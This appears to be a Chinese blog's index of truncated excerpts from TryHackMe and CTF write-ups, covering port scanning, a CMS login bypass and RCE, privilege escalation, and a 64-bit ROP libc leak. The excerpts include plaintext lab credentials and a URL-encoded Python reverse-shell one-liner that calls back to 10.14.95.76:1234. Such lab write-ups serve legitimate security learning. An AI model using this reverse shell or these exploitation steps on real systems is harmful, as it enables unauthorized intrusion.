[thm] Silver Platter
information port scan 浏览网页这里有提到一个网页应用,这里踩了一个大坑,因为linux下是区分大小写的,而我直接复制粘贴是没法访问这个网页。 查找发现这个网页应用存在登录绕过 https://gist.github.com/ChrisPritchard/4b6d5c70d9329ef116266a6c238dcb2d https...
information port scan 浏览网页这里有提到一个网页应用,这里踩了一个大坑,因为linux下是区分大小写的,而我直接复制粘贴是没法访问这个网页。 查找发现这个网页应用存在登录绕过 https://gist.github.com/ChrisPritchard/4b6d5c70d9329ef116266a6c238dcb2d https...
information port scan 目录枚举发现特别的路径http://wonderland.thm/r/a/b/b/i/t user1 通过web源代码获得用户凭据alice:HowDothTheLittleCrocodileImproveHisShiningTail user2 劫持python模块提权 user3 再rabbit的目录下发现...
64位泄露libc vuln的buf变量存在溢出 64位函数传入的参数依次存在寄存器rdi,rsi,rdx (顺序从左到右),返回值存在rax中 bamuwe@qianenzhao:~/done/bjdctf_2020_babyrop$ ROPgadget --binary bjdctf_2020_babyrop --only 'pop|re...
information port scan 优化一下工作流,这个rustscan真的快。(以前🧌推荐的) robots.txt robots.txt中发现一个site_map路径。 没啥用啊 网站的主页也只有一个登录页面看起来能做文章。 对8081端口进行枚举,发现了两个可能能利用的路径,一个auth,经过尝试应该和31331端口的是一个接口,ping目录...
information port scan 通过子域名爆破发现一个子域名,得到用户邮箱和密码。web/[andre@cmess.thm:KPFTN_f2yxe%] user1 在主域下发现cms框架为gila cms。搜索发现有一个nday,Exploit Title: Gila CMS 1.10.9 - Remote Code Execution (RCE) (Auth...
information 端口扫描 panel 改个后缀就可以成功上传了,但是反弹shell居然用不了,可能是php版本问题,换个一句话🐎上去。 user1 python3%20-c%20’import%20os,pty,socket;s=socket.socket();s.connect((“10.14.95.76”,1234));[os....
information port scan 8080端口上是一个tomcat,常规访问下manager,如果能直接上传war就最简单了,但是发现无法通过网页做一个认证,于是我打算使用curl上传war,但是开启了csrf,没法利用。 回过头来看tomcat版本,发现存在一个nday msf msf可以直接利用,可美了我了,网页上直接显示了账号密码。 u...
information port scan 开启了http,pop3,smb等服务,我们先关注smb服务。 获得了两个文件,一个attention.txt,一个log1.txt。内容大致如下: 从attention.txt获得了一个用户名Miles Dyson,log1.txt类似一个密码本,也可能是用户名,我们需要找一个地方验证。 一开始我尝试使用hydra爆破pop3服...
information 端口扫描 这个页面有点炫酷,一开始搞得我还蛮尴尬,因为一上来就开扫,整的范围很大,一时间难以聚集攻击向量。啊拉巴拉不说,一口价,robots.txt wget http://10.10.51.179/fsocity.dic 获得了key1,同时下载到一个字典。这个字典做一个处理. 这个字典有大量的重复项。 通过扫描可以看出这是...
information 端口扫描 这里重点关注ftp和smb服务。 ftp服务且版本为ProFTPD 1.3.5 匿名用户登录smb服务,可以获得一个log.txt文件。文件大致内容如下: Enter same passphrase again: ...